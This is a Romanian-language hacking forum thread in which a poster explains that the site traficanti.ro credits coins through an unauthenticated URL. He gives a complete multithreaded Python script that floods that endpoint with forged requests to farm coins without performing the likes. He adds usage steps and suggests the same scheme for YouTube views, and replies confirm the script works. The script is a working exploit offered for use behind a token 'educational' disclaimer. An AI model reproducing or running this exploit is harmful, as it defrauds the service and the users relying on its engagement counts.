Jump to content
ionut.hulub

Trafic, view-uri, like-uri pentru toata lumea

Recommended Posts

Fac acest tutorial in speranta ca o sa ajute pe unu-doi si poate mai renunta lumea la e-whoring.

Este un mic tutorial despre cum sa faceti puncte pe traficanti.ro

Uitati de macro-uri. Personal, ori de cate ori vad pe cineva ca posteaza un macro trag concluzia ca e noob (nu ca ar fi ceva rau in asta).

O sa incep cu un disclaimer: Fac acest tutorial in scop educativ. Folositi script-ul pe riscul vostru. Eu nu imi asum nici o responsabilitate pentru ce faceti cu el. Este de datoria voastra sa respectati regulile impuse de traficanti.ro daca vreti sa le folositi serviciile.

Si acum, ca sa trec la subiect, investigand putin cu wireshark ce se intample pe site (traficanti.ro) atunci cand dau like la o pagina de facebook, am observat ca punctele sunt adaugate in cont imediat dupa ce este apelat un link de forma:

http://www.traficanti.ro/liked.php?me=1234&him=4321&count=777

Destul de usor de inteles zic eu, baietii trimit niste date prin intermediu la url:

"me=" urmat de un numar care identifica contul meu (respectiv al vostru)

"him=" urmat de un numar care identifica contul persoanei careia ii dai like la pagina de facebook

"count=" numarul de view-uri de pe pagina de facebook inainte sa dai tu like

In momentul in care deschizi (in browser sau altfel) un astfel de url, iti creste automat numarul de monede pe traficanti.ro. Nici macar nu verifica sa fii logat. Tot ce ii intereseaza sunt datele de mai sus.

Stiind astea, am pus cap la cap urmatorul script:


"""
A simple script that can increase your
coins count of traficanti.ro

"""

import urllib2
import threading

#GLOBALS
ME = '1234'


def worker(start_at, end_at):
"""
Sends GET requests to traficanti.ro, thus
increasing the coins balance

"""
for count in xrange(start_at, end_at):
urllib2.urlopen(
'http://www.traficanti.ro/liked.php?me=%s&him=%s&count=0' %
(ME, str(count))
)


def main():
"""
Entry point

"""
threads = list()

for start_at in range(0, 5000, 1000):
threads.append(
threading.Thread(
target=worker,
args=(start_at, start_at + 1000)
)
)
threads[-1].start()

for thread in threads:
thread.join()


if __name__ == '__main__':
main()

1) Ca sa folositi scrip-ul, in primul cand trebuie sa aveti Python2.7 instalat.

2) Apoi, salvati script-ul intr-un fisier cu extensia ".py"

3) Trebuie sa aflati care este numarul care identifica contul vostru. E simplu... intrati pe traficanti.ro, si uita-ti-va aici:

traficanti.png

Unde scrie "1234" in imaginea asta, o sa fie scris codul vostru.

4) Modificati in script linia "ME = '1234'", inlocuind 1234 cu codul vostru.

5) Rulati script-ul.

IMPORTANT

Ca sa faceti puncte fara sa mai dati like la paginile alea, trebuie sa setati "count=0" in url. In felul asta, cand sistemul lor verifica cate like-uri are pagina dupa ce "ati dat voi like", va vedea ca are mai multe ca inainte si va crede ca ati dat like. In script e deja setat parametru, nu trebuie sa il modificati.

Eu l-am lasat sa ruleze putin peste 10 minute si mi-a facut 11500 de puncte.

Succes.

PS. Si la view-uri pe Youtube si altele se poate face cam aceeasi schema.

  • Upvote 1
  • Downvote 1
Link to comment
Share on other sites

eu nu reusesc..

root@bt:~/Desktop# ./script.py
./script.py: line 5:
A simple script that can increase your
coins count of traficanti.ro

: command not found
./script.py: line 11: ME: command not found
./script.py: line 14: syntax error near unexpected token `('
./script.py: line 14: `def worker(start_at, end_at):'

Edit: folosesc

root@bt:~# python

Python 2.6.5 (r265:79063, Apr 16 2010, 13:09:56)

[GCC 4.4.3] on linux2

Type "help", "copyright", "credits" or "license" for more information.

>>>

Edited by alezu2000
Link to comment
Share on other sites

Mi-a mers scriptul. Dar nu vin like'urile pe fb. Nu trebuie sa fie la prieteni? Ah si nu te lasa cu https am pus http :)) ce idioti.

Nu stiu daca ai inteles cum merge treaba... Faci "coins" pe traficanti cu script-ul, dupa care trebuie sa adaugi o campanie pe site ca sa iti intre tie like-uri...

Link to comment
Share on other sites

@bDyds. Sigur ca da. Am facut acum ceva timp un program AMF Booster. Il gasesti pe RST Market. Din pacate au schimbat site-ul vinerea trecuta si nu am mai avut timp sa il patch-uiesc, dar o sa fac asta cat de curand.

Pentru toti cei care se plang ca nu primesc vizite:

E un site romanesc si e doua noaptea. Normal sa nu prea aiba trafic.

Pe deasupra, nu am promis nimanui ca o sa primeasca vizite. Nici macar nu am folosit site-ul ala ca sa generez trafic.

Asta este doar un tutorial despre cum sa faceti multe credite. Va rog sa nu va mai plangeti si sa il tratati ca atare.

Edited by ionut.hulub
Link to comment
Share on other sites

Posibil ca am facut vre-o 11000 de monezi,am adugat si eu 1 site nou sa-i fac reclama cu CPC 5 monezi si nu am nici o vizita.

eu ma iau dupa addmefast .. la amf sunt o gramada de useri si din ro si din lumea intreaga , insa cu cpc 5 nu iti intra nimeni , da skip la pagina / poza ta pentru ca oferi putin . eu faceam 15k-20k si dupa dadeam drumul la poze sau pagini cu cpc minim 8. (pagina = cpc 8 , poza = cpc 9) . in maxim 1 ora deja imi lua toate creditele , era activitate f mare :) .

Link to comment
Share on other sites

Am facut campanie. Abia vine 1. Sunt putini useri online cred. Degeaba avem mii de coins daca nu are cine sa dea click pentru noi. Site praf.

Nu primesti like-uri deoarece cand te inregistrezi pentru prima data contul este setat "inactiv" inclusiv link-urile pe care le adaugi, scrie pe site ca trebuie sa fii activ cel putin odata la 2 zile.

Website-urile/Cont-urile tale au fost INACTIVE timp de: 298 zile 17 ore 14 minute 38 secunde

Trebuie sa fii activ pe site cel putin odata la 2 zile pentru a tine Website-urile/Cont-urile Active

Sau Cumpara un Abonament PREMIUM

Scriptul merge de minune.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...